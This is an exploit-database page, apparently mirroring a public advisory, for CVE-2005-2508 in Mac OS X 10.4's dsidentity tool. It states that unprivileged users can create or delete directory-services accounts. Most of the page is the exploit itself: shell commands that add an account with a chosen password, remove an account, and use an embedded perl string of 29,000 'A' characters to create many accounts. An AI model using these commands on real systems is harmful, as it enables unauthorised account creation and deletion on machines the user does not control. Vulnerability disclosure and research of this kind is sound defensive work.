[] NeoSense
E X P L O I T S
title author type platform port cve id

Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion

Author: Neil Archibald
type: local
platform: osx
port: 
date_added: 2005-08-15 
date_updated: 2013-06-14 
verified: 1 
codes: CVE-2005-2508;OSVDB-18781 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/14630/info

A vulnerability in Apple Directory Services allows unprivileged users to create or delete directory services idnetity accounts.

This issue was originally described in BID 14567 Apple Mac OS X Multiple Vulnerabilities. It is now being assigned its own BID.

To create an account named 'Username' with the password 'pass':
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -a Username -s pass -v

To delete an account named 'Username':
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -r Username -v

To create multiple accounts:
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -a `perl -e 'print "A" x 29000'`
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.